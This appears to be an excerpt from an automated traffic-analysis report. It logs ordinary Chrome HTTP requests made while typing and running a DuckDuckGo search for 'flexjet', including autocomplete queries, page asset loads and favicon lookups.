Source: global traffic	HTTP traffic detected: GET /ac/?q=fl&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ac/?q=fl&kl=wt-wt HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ac/?q=flex&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ac/?q=flexj&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ac/?q=flexjje&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ac/?q=flexjje&kl=wt-wt HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ac/?q=flexjjet&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ac/?q=flexjjet&kl=wt-wt HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ac/?q=flexjj&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ac/?q=flexjj&kl=wt-wt HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ac/?q=flexj&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ac/?q=flexj&kl=wt-wt HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ac/?q=flexje&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ac/?q=flexje&kl=wt-wt HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ac/?q=flexjet&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ac/?q=flexjet&kl=wt-wt HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /?t=h_&q=flexjet HTTP/1.1host: duckduckgo.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: same-originsec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /dist/s.00b702c7f6728817f85f.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /dist/r.afc03c5e103c89381710.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /dist/wpl.main.6bf3d4a38a64f0f5c871.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /dist/wpl.vendors.15a9724ad11a243a515a.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /font/ProximaNova-Reg-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /font/ProximaNova-Sbold-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /dist/b.65e6032da5acb575394e.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /dist/lib/l.32113981e35aa54fc221.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /dist/locale/en_US.a01e3360b693943fa2029a43691ed16e.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /dist/util/u.ad8bd89133253d1e4be1.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /dist/wpmv.fd0532aedd875dd2e193.js HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /dist/wpm.main.376f82d164a97d9b2397.js HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /dist/d.21c0e9dd3ab39dcc7aea.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /dist/g.ff31a455611570db97a7.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /assets/logo_header.v109.svg HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /d.js?q=flexjet&t=A&l=us-en&s=0&a=h_&ct=US&vqd=4-253568358988729779796085164939430573451&bing_market=en-US&p_ent=airline&ex=-1&dp=ASj8L4It2rBvbCrznoVAyJ8ydJvoAfCp7heLt-y64QwARiN62U9_IwytII5pKKXlsgwrGWd_fXoKXkBW1LJC5fV1TOLiB7-2_u9O8czbbGw.kqtrVddIXfiAJFWgaadkRw&wpa=Flexjet&perf_id=c88386c9437397ce&parent_perf_id=2604a6ba265a4931&host_region=usc&sp=0&dfrsp=1&baa=1&bcca=1&bpa=1&btaa=1&wrap=1&aps=0&aboutmapsexp=b&bccaexp=b&biaexp=b&btaaexp=b&direxp=b&litexp=c&msvrtexp=b&newsexp=b&shoppingexp=b&you_news_verticalexp=b HTTP/1.1host: links.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /assets/logo_header.v109.svg HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /dist/wpm.3359.0c3e0fbf9f8cff52c9ab.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /dist/wpm.1619.ea48354a2359f567744b.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /dist/wpm.9982.d2c6c34ca61e3ca7c452.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /dist/s.97bc44cde1cf9fb5ddcd.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dist/react-assets/fe21b530ba74e4553643.svg HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /dist/react-assets/212874b7047e393bacb8.svg HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /dist/react-assets/23d563f964108cbb5b74.svg HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /assets/icons/related/loupe-grey.svg HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /assets/icons/favicons/wikipedia.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /dist/react-assets/96adebdbdbc5d4e75d7f.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /dist/react-assets/0557b8fc0e7117648c6b.gif HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /iu/?u=https%3A%2F%2Fwww.bing.com%2Fth%3Fid%3DOADD2.7971501094202_1ZTQBC2WZV07776MFH%26pid%3D21.2%26h%3D32&f=1 HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ip3/flexjjet.com.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
